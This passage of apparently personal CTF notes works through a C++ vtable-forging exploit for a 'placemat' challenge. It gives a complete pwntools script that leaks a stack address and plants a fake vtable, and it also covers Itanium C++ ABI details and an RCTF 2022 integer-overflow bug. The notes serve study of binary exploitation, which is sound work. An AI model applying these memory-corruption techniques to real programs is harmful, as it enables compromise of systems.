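vptr, next_ptr = 0x56558F00, 0xFFFFD0A4            # made-up addresses
frame = bytearray(struct.pack(OBJ_FMT, vptr, b"") + bytes(8))

# scanf("%s") with a 20-byte name writes 20 bytes plus a terminating NUL at offset 24.
name = b"A" * 20
frame[4:4 + len(name) + 1] = name + b"\x00"
# A later store of a pointer right after the object overwrites that NUL.
frame[24:28] = struct.pack("<I", next_ptr)

leak = c_string(bytes(frame), 4)
print(leak[20:].hex())
```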

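Big discovery: the program is 32-bit, so it needs 32-bit libraries. No wonder neither patchelf nor ubuntu 22.04 (which has no 32-bit runtime by default) worked. With the 32-bit debian libc 2.35 downloaded, it finally ran.

The binary I compiled myself is not exploitable, but the provided one is: there the two objects are further from the canary, because the Game object is placed after the two Player objects, and the first members of Game are player, opponent and so on, which solves the problem of the NUL byte scanf appends. Is that layout a coincidence, or can the challenge author control where variables sit on the stack? Debugging the provided binary is unpleasant since it has no symbols. Recovering symbols in IDA and debugging remotely sounds like too much trouble, and some inputs cannot be typed by hand anyway, so pwntools it is.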

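  • I did not understand why random::bit always picked the first player, with no randomness at all, while the binary I compiled behaved randomly. I thought it was just luck, but it turns out to be caused by the issue below.
  • Why does printPlayerNames print more than 20 characters even though %20s is specified?
    scanf and printf differ here. printf("%20s", buf); only sets the minimum field width for alignment, and a longer string is printed in full. %20s limits the input length only in scanf. To limit output length in printf use %.20s, or pass the length as an argument with %.*s (a positional argument can also be used, see the printf manual). Left alignment is %-20s.
  • congratulate uses the typeid operator on a polymorphic object to get its type id. What does it do underneath? All I found is that it looks something up through the vtable; the assembly should tell. I looked at the c++ abi, but there is too much to find the key points. I also found a blog series. It is a lot of material, but I really want to understand the ABI.
    The Stack Overflow answer is clearer; examples help, and a wall of text is hard to follow.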
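
The width versus precision distinction for output can be tried quickly in Python, whose % operator follows the same conventions as printf for %s. This only illustrates the output side; scanf's input limit is not modelled here.

```python
name = "A" * 25

padded = "%20s" % name        # width only: nothing is cut off
truncated = "%.20s" % name    # precision: at most 20 characters
dynamic = "%.*s" % (5, name)  # precision taken from the argument list
left = "%-6s|" % "ab"         # left-aligned within a width of 6

print(len(padded), len(truncated), dynamic, left)
```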

c++ abi (vtables & RTTI)

  • _ZTV is a prefix for vtable, _ZTS is a prefix for type-string (name) and _ZTI is for type-info.

  • 重要的概念

    • primary base class: For a dynamic class, the unique base class (if any) with which it shares the virtual pointer at offset 0.
    • proper base class: any direct or indirect base class of a class in the inheritance tree (not the class itself)
    • secondary virtual table: The instance of a virtual table for a base class that is embedded in the virtual table of a class derived from it.
    • The primary virtual table can be viewed as two virtual tables accessed from a shared virtual table pointer.
    • virtual table group: The primary virtual table for a class along with all of the associated secondary virtual tables for its proper base classes.
  • vtable components

    • Virtual Base (vbase) offsets are used to access the virtual bases of an object.
    • The offset to top holds the displacement to the top of the object from the location within the object of the virtual table pointer that addresses this virtual table
    • The typeinfo pointer points to the typeinfo object used for RTTI
    • The virtual table address point points here
    • Virtual function pointers. Each pointer holds either the address of a virtual function of the class, or the address of a secondary entry point that performs certain adjustments before transferring control to a virtual function.
  • vtable construction: describes in detail how the vtable is built for proper base classes in each case.

    • For example, for a class with
      No inherited virtual functions
      No virtual base classes
      Declares virtual functions
      the vtable is simply offset-to-top & RTTI fields & virtual function pointers
  • The elements of the VTT array for a class D (a VTT is declared for each class type that has indirect or direct virtual base classes):

    • Primary virtual pointer
      address of the primary virtual table for the complete object D.
    • Secondary VTTs
      for each direct non-virtual proper base class B of D that requires a VTT, in declaration order, a sub-VTT for B-in-D, structured like the main VTT for B, with a primary virtual pointer, secondary VTTs, and secondary virtual pointers, but without virtual VTTs.

      NOTE: This construction is applied recursively.

    • Secondary virtual pointers
      for each base class X which (a) has virtual bases or is reachable along a virtual path from D, and (b) is not a non-virtual primary base, the address of the virtual table for X-in-D or an appropriate construction virtual table.

      X is reachable along a virtual path from D if there exists a path X, B1, B2, …, BN, D in the inheritance graph such that at least one of X, B1, B2, …, or BN is a virtual base class.

      The order in which the virtual pointers appear in the VTT is inheritance graph preorder.

      NOTE: There are virtual pointers for direct and indirect base classes. Although primary non-virtual bases do not get secondary virtual pointers, they do not otherwise affect the ordering.

      Primary virtual bases require a secondary virtual pointer in the VTT because the derived class with which they will share a virtual pointer is determined by the most derived class in the hierarchy.

      Secondary virtual pointers may be required for base classes that do not require secondary VTTs. A virtual base with no virtual bases of its own does not require a VTT, but does require a virtual pointer entry in the VTT.

    • Virtual VTTs
      For each proper virtual base class in inheritance graph preorder, construct a sub-VTT as in Secondary VTTs above.

      NOTE: The virtual VTT addresses come last because they are only passed to the virtual base class constructors for the complete object.

  • Single inheritance

    • The derived class's vtable is shown below. Note that the vtable pointer stored in the object points at the third entry, i.e. it skips the first two.
    Address   Value     Meaning
    0x400b40  0x0       top_offset (more on this later)
    0x400b48  0x400b90  Pointer to typeinfo for Derived (also part of the above memory dump)
    0x400b50  0x400a80  Pointer to Derived::Foo(). Derived’s _vptr points here.
    0x400b58  0x400a90  Pointer to Parent::FooNotOverridden() (same as Parent’s)
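  • Multiple inheritance

    • With multiple inheritance the most derived class has several vtable pointers in its object, as in the layout below. Why two vptrs? Because a Child may be converted to a Father* or Mother* and passed as an argument; the receiving function must be able to use the Father part of the layout without knowing Child exists. The Father data obviously has to be in that part, and so does Father's vtable pointer, which points into Child's vtable to provide the virtual function information.
    _vptr$Mother
    mother_data (+ padding) (what is this padding?)
    _vptr$Father = non-virtual thunk to Child::FatherFoo(void)
    father_data
    child_data1
    • Note that Child's vtable now actually holds two tables; see the second part of the vtable below.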
    ; `vtable for'Child
    _ZTV5Child       dq 0                    ; offset to this
                     dq offset _ZTI5Child    ; `typeinfo for'Child
    off_555555557D48 dq offset _ZN6Mother9MotherFooEv
                                            ; DATA XREF: main+8↑o
                                            ; Mother::MotherFoo(void)
                     dq offset _ZN5Child9FatherFooEv ; Child::FatherFoo(void)
                     dq -8                   ; offset to this
                     dq offset _ZTI5Child    ; `typeinfo for'Child
    off_555555557D68 dq offset _ZThn8_N5Child9FatherFooEv
    									 ; `non-virtual thunk to'Child::FatherFoo(void)
    
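  • However, when the child class overrides a function of its parent, polymorphism has to keep working: after a Child* this is converted to a Father* this, a call to ptr->FatherFoo() must still run Child::FatherFoo(). The compiler detects the override, generates the Child layout shown above, and emits a thunk that stands in for Father::FatherFoo() and adjusts the this pointer so that it becomes the Child pointer again. The secondary virtual table that _vptr$Father points to holds the address of this thunk.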

    .text:0000555555555227 ; __int64 __fastcall `non-virtual thunk to'Child::FatherFoo(Child *__hidden this)
    .text:0000555555555227                 public _ZThn8_N5Child9FatherFooEv
    .text:0000555555555227 _ZThn8_N5Child9FatherFooEv proc near
    .text:0000555555555227                 sub     rdi, 8          ; this
    .text:000055555555522B                 jmp     short _ZN5Child9FatherFooEv ; Child::FatherFoo(void)
    .text:000055555555522B _ZThn8_N5Child9FatherFooEv endp
    
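    • The top_offset in the vtable is the row holding -8. It looks purely informational: the distance from the Father part of the Child object to the top of the object.
      The thunk uses sub rdi, 8 directly and never reads this field.
  • Multiple inheritance over three levels, with Grandparent inherited virtually.

    • New items: construction vtable for Parent1-in-Child, VTT for Child, virtual-base offset.
    • The virtual-base offset serves Parent1's initialization inside Child::Child(): when Parent1 needs to reach Grandparent's data, it is the offset from the this pointer (which at that point refers to the Parent1 part of Child, i.e. the start of Child) to the Grandparent part of the Child object.
    • In IDA, construction vtable for Parent1-in-Child and vtable for Parent1 mostly overlap, except that the virtual-base offset at the start of the former sits just above the latter.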
    ; `construction vtable for' Parent1-in-Child
    	_ZTC5Child0_7Parent1 dq 20h 	; that is virtual-base offset
    ; `vtable for' Parent1
    	...
    
    • VTT
    Address    Value      Symbol                                          Meaning
    0x4009a0   0x400950   vtable for Child + 24                           Parent1's entries in Child's vtable
    0x4009a8   0x4009f8   construction vtable for Parent1-in-Child + 24   Parent1's methods in Parent1-in-Child
    0x4009b0   0x400a18   construction vtable for Parent1-in-Child + 56   Grandparent's methods for Parent1-in-Child
    0x4009b8   0x400a98   construction vtable for Parent2-in-Child + 24   Parent2's methods in Parent2-in-Child
    0x4009c0   0x400ab8   construction vtable for Parent2-in-Child + 56   Grandparent's methods for Parent2-in-Child
    0x4009c8   0x400998   vtable for Child + 96                           Grandparent's entries in Child's vtable
    0x4009d0   0x400978   vtable for Child + 64                           Parent2's entries in Child's vtable

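    Why is there a VTT? Walking through Child's construction makes it clear:

    • First Grandparent is constructed, initializing the vtable pointer to point at its primary vtable.
    • Then Parent1 sets the vtable pointer in the Child object to the Parent1-in-Child value from the VTT (i.e. vtable for Parent1),
      and also changes the Grandparent vtable pointer to point at the Grandparent part of that vtable. The key question is how Parent1 knows the distance between itself and Grandparent inside its subclass Child. The answer is that the VTT address is passed in: the two Parent1-in-Child pointers identify the matching construction vtable and the vbase offset stored in it.
      • In this particular case a single pointer would actually be enough, but once a parent has several base classes of its own the VTT becomes necessary: the vbase offsets in the secondary vtables of those bases are needed to work out the vtable pointer value of each base (all of which live in the Child object).
    • Then Parent2 is initialized in the same way and modifies Grandparent's vtable pointer again.
    • Because a base-class constructor must not assume that it was called from its subclass's constructor, Child finally rewrites all vtable pointers so that they point at the corresponding parent parts of Child's own vtable.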

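    If the situation becomes

  • “in-charge” and “not-in-charge” constructor and destructor: explanation on Stack Overflow

    Constructors can differ: in the example above, if a Child is defined and a standalone Parent is defined as well, there will be two Parent constructors, one used only inside Child::Child() and the other used when a Parent is constructed on its own. These are the so-called in-charge and not-in-charge constructors.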

    • An “in-charge” (or complete object) constructor is one that constructs virtual bases,
      and a “not-in-charge” (or base object) constructor is one that does not.
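    • Hmm, I don't feel like reading further. There is also some material on destructors.
  • With multiple inheritance, what comes last after the vtables is the VTT, i.e. the table of vtables.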
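
To tie the non-virtual thunk and top_offset from the multiple-inheritance case together, here is a minimal Python model of the pointer arithmetic. The offsets (Father subobject at +8, top_offset of -8) are read off the IDA listings above; the object address and the helper names are made up for illustration, and in the real binary this work is done by the compiler-generated thunk, not by anything like this code.

```python
# Toy model of the `this` adjustments in the Child : Mother, Father example.
# Offsets come from the listings above; names and addresses are hypothetical.

FATHER_OFFSET = 8   # Father subobject sits 8 bytes into Child
TOP_OFFSET = -8     # "offset to this" stored in Child's secondary vtable


def child_to_father(child_this: int) -> int:
    """Child* -> Father* conversion: point at the Father subobject."""
    return child_this + FATHER_OFFSET


def non_virtual_thunk(father_this: int) -> int:
    """What the thunk does before jumping to Child::FatherFoo: sub rdi, 8."""
    return father_this - 8


def top_of_object(subobject_this: int, top_offset: int) -> int:
    """What top_offset encodes: subobject address + top_offset = object start."""
    return subobject_this + top_offset


child = 0x1000  # hypothetical address of a Child object
father_view = child_to_father(child)
print(hex(father_view), hex(non_virtual_thunk(father_view)))
```

Both routes lead back to the start of the Child object, which matches the observation that the thunk hard-codes the adjustment instead of reading top_offset.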

RTTI

  • The typeid operator produces a reference to a std::type_info structure with the following public interface
  namespace std {
    class type_info {
      public:
        virtual ~type_info();
        bool operator==(const type_info &) const;
        bool operator!=(const type_info &) const;
        bool before(const type_info &) const;
        const char* name() const;
      private:
        type_info (const type_info& rhs);
        type_info& operator= (const type_info& rhs);
    };
  }
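  • Except for direct or indirect pointers to incomplete types, the equality and inequality operators on type_info objects can be written as address comparisons: two type_info structures describe the same type if and only if they are the same structure (at the same address).
  • layout
    • abi::__class_type_info is used for class types having no bases, and is also a base type for the other two class type representations.
    • Skipping the rest.

This is truly exhausting. Looking back, typeid comes down to just this much: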

char __cdecl std::type_info::operator==(std::type_info *a1, std::type_info *a2)
{
  const char *v3; // eax

  if ( (unsigned __int8)std::__is_constant_evaluated() )
    return a1 == a2;
  if ( *((_DWORD *)a1 + 1) == *((_DWORD *)a2 + 1) )
    return 1;
  if ( **((_BYTE **)a1 + 1) == 42 )
    return 0;
  v3 = (const char *)std::type_info::name(a2);
  return !strcmp(*((const char **)a1 + 1), v3);
}

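The second if compares the name pointers directly (these point at the mangled name, e.g. "3Bot", not a demangled one). However, simply changing the pointer to Bot's vtable would make the call land in the Bot::takeTurn member function. So we need to forge a whole vtable, and we do it on the stack, which is why the stack pointer has to be leaked. The overwrite happens in the second round, which goes through Game::Multiplayer(); even if the canary gets corrupted it does not matter, as long as congratulate is executed inside Game::play().

Hmm, does it need 4-byte alignment? The data on the stack is already aligned, so starting at the beginning of name is fine.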
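
The comparison logic in the decompiled operator== above can be modelled in a few lines of Python. This is only a sketch: the `memory` dict and its addresses are invented stand-ins for the process's memory, the `__is_constant_evaluated()` branch is left out, and `type_name` models libstdc++'s name(), which skips a leading '*'.

```python
# Model of the decompiled std::type_info::operator== shown above.
# `memory` maps hypothetical addresses to byte strings standing in for
# NUL-terminated C strings.

def type_name(name_ptr: int, memory: dict) -> bytes:
    """Model of type_info::name(): a leading '*' is skipped."""
    s = memory[name_ptr]
    return s[1:] if s.startswith(b"*") else s


def type_info_equal(a_name_ptr: int, b_name_ptr: int, memory: dict) -> bool:
    # Second `if` in the decompilation: identical name pointers mean equal.
    if a_name_ptr == b_name_ptr:
        return True
    # Third `if`: a name starting with '*' (42) can only match by pointer.
    if memory[a_name_ptr].startswith(b"*"):
        return False
    # Fallback: strcmp on the mangled names.
    return memory[a_name_ptr] == type_name(b_name_ptr, memory)


memory = {
    0x1000: b"3Bot",    # name string referenced by one typeinfo
    0x2000: b"3Bot",    # a second copy of the same mangled name
    0x3000: b"5Human",
}
print(type_info_equal(0x1000, 0x2000, memory))
```

If this model is right, placing Bot's real typeinfo address in the forged table already satisfies the pointer comparison, so the strcmp path is never needed.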

.rodata:0804C35C                 dd 0                    ; offset to this
.rodata:0804C360                 dd offset _ZTI5Human    ; `typeinfo for'Human
.rodata:0804C364 off_804C364     dd offset _ZN5HumanD2Ev ; DATA XREF: Human::Human(void)+15↑o
.rodata:0804C364                                         ; Human::~Human()+6↑o
.rodata:0804C364                                         ; Human::~Human()
.rodata:0804C368                 dd offset sub_804AEF2
.rodata:0804C36C                 dd offset requestName
.rodata:0804C370                 dd offset Human__takeTurn

.rodata:0804C1D4 ; `typeinfo for'Bot
.rodata:0804C1D4 _ZTI3Bot        dd offset unk_804EEC8   ; DATA XREF: sub_804AA96+8C↑o
.rodata:0804C1D4                                         ; .rodata:0804C1A8↑o
.rodata:0804C1D8                 dd offset a3bot         ; "3Bot"
.rodata:0804C1DC                 dd offset off_804C1E8

Forge the table to look like the Human vtable above, except that the typeinfo slot is replaced with the address of Bot's typeinfo.

pl1 = flat([b'yog'.ljust(20, b'\x00'), p2_name_addr])
pl2 = flat([0, 0x804C1D4, 0x804AED0, 0x804AEF2, 0x804AF18, 0x804AF4E])

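Note that the Game class has no vtable pointer; after staring at vtables for too long, don't start seeing them everywhere.

OK, that does not work: I overlooked the Game object that follows immediately afterwards, which would get overwritten.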

exp:

from pwn import *
context.log_level = 'debug'
context.binary = './placemat'
p = process("./placemat")
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sa=lambda x,y:p.sendafter(x,y)
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()

ru(b"3 Exit\n")
sl(b"1")
ru(b"(h)uman? ")
sl(b"h")
ru(b"Player 1: ")
sl(b"yog")
ru(b"Player 2: ")
sl(b"b" * 20)
ru(b"b" * 20)
stack_addr = u32(p.recv(4))
p2_name_addr = stack_addr + 0x18 + 0x8

log.success(f'leak value: 0x{stack_addr:x}')
ru(b"(e.g. A3): ")
sl(b"A1")
ru(b"(e.g. A3): ")
sl(b"B1")
ru(b"(e.g. A3): ")
sl(b"A2")
ru(b"(e.g. A3): ")
sl(b"B2")
ru(b"(e.g. A3): ")
sl(b"A3")

pl1 = flat([b'yog'.ljust(20, b'\x00'), p2_name_addr+20+48+4])
# The run of \x00 bytes is only there to skip over the Game object's memory.
pl2 = flat([b'fake_bot', b'\x00'*(20+48-8), 0, 0x804C1D4, 0x804AED0, 0x804AEF2, 0x804AF4E, 0x804AF4E])

ru(b"3 Exit\n")
sl(b"1")
ru(b"(h)uman? ")
sl(b"h")
ru(b"Player 1: ")
sl(pl1)
#gdb.attach(p)
#gdb.attach(p, 'b *0x804AA96\nc')
#input('wait for gdb')
ru(b"Player 2: ")
sl(pl2)

sl(b"A1")
sl(b"B1")
sl(b"A2")
sl(b"B2")
sl(b"A3")

itt()

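The problem with this exp is that who moves first is random and the script never checks it, so roughly half of the runs do not reach the intended result. Either run it a few more times, or wrap it in a big loop that catches the exception.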
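
The "big loop" idea can be sketched as a small retry wrapper. The names here are hypothetical: `attempt` stands for a function that starts a fresh process and runs the exploit once, raising (for example EOFError, which pwntools tubes raise when the target exits mid-receive) when the run went wrong. The stand-in `make_flaky` only simulates such a function so the sketch runs without the binary.

```python
# Generic retry wrapper; `attempt` is a hypothetical callable that runs the
# exploit once against a fresh process and raises on failure.

def run_until_success(attempt, max_tries=10, retry_on=(EOFError,)):
    """Call attempt() until it returns without raising one of retry_on.

    Returns (number_of_tries, result); raises RuntimeError if all tries fail.
    """
    for tries in range(1, max_tries + 1):
        try:
            return tries, attempt()
        except retry_on:
            continue  # wrong turn order or dead target: start over
    raise RuntimeError(f"exploit failed {max_tries} times in a row")


def make_flaky(failures):
    """Stand-in for the real exploit: fails `failures` times, then succeeds."""
    state = {"left": failures}

    def attempt():
        if state["left"] > 0:
            state["left"] -= 1
            raise EOFError("process exited")
        return "shell"

    return attempt


print(run_until_success(make_flaky(2)))
```

For the real script, `attempt` would wrap everything from `process("./placemat")` up to the final moves, and would have to detect the wrong turn order itself if the target does not simply exit.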

RCTF 2022

MyCarShowSpeed

  • New a Game

    • stability, performance. I really can't spot a bug here…
  • Show Information

  • Visit The Store

    • Buy Goods:

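      • SuperTire has no effect at all. Does that mean anything special?
      • If you have enough money to buy the flag but wintimes is too low, your cars get confiscated. Is there anything special about that?

      **There really is. In hindsight it is obvious: while owning two or more cars, first use fix car to remove a car from carlist, then buy the flag; the remaining cars are deleted as well and carNum drops to zero.**

      • Didn't spot it…
    • Sell Goods:

      • A car is "deleted" by simply nulling its pointer in the linked list; the node itself is not removed.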
    • Fix Cars

          car->fixTime = time(NULL);
          car->fixed = 1;
          _this->carList->addCar(car, _this->carList);
          _this->carList->carNums++;
          if(carList->carNums > 1)
          {
              car->isTaken = 1;
              carList->deleteCar(car, &carList);
              carList->carNums--;
              puts("OK! We will temporily take your car and fix it soon!");
              return;
          }
          puts("OK! We'll soon fix it!");
      

      When you own more than one car, the car is removed from the garage (carList), rather than merely having fixed set to 1.

    • Fetch Cars

      • Integer overflow bug
            fixDifficulty = car->fixDifficulty;
            fixedTime = fixDifficulty * time(0LL) - car->fixTime;
            cost = (int)(0.1 * (double)(int)fixedTime) + 5;
      

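      The multiplication binds tighter than the subtraction, so the huge timestamp returned by time() is itself multiplied by fixDifficulty. The result is then truncated to int, where it overflows and can come out negative. In testing, the second time was already enough.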

    1. Leave
  • Switch Cars

  • Rules

  1. Quit

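??? Verdict: bad. The provided source code and source files behave differently from the target binary all over the place; I got thoroughly confused and gave up. At its core this is a tcache exploitation challenge.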
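
The integer overflow noted under Fetch Cars can be reproduced with a small Python model of the cost formula. This is a sketch under assumptions: the timestamp, the 10-second repair time and the fixDifficulty values are made-up inputs, and `to_int32` imitates the truncation to a 32-bit signed int that the decompiled casts perform. Which fixDifficulty actually triggers the wrap in the binary depends on its real values.

```python
# Model of the Fetch Cars cost computation with 32-bit signed truncation.
# All concrete numbers below are hypothetical inputs.

def to_int32(x: int) -> int:
    """Wrap a Python int into the range of a C 32-bit signed int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x >= (1 << 31) else x


def fetch_cost(fix_difficulty: int, now: int, fix_time: int) -> int:
    # Same precedence as the decompilation: the whole timestamp is multiplied.
    fixed_time = fix_difficulty * now - fix_time
    # (int) casts in C truncate toward zero, as int() does in Python.
    return int(0.1 * to_int32(fixed_time)) + 5


now = 1_670_000_000      # a timestamp around December 2022
fix_time = now - 10      # car handed in 10 seconds earlier
for difficulty in (1, 2, 3):
    print(difficulty, fetch_cost(difficulty, now, fix_time))
```

With these inputs the cost is small for difficulty 1, very large for 2, and negative once the product no longer fits in 31 bits, which is the condition the exploit wants.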

Diary

C++ reversing. I ran into the decompiled code of std::string and std::map. To really understand it I should look for a tutorial on reversing the STL.
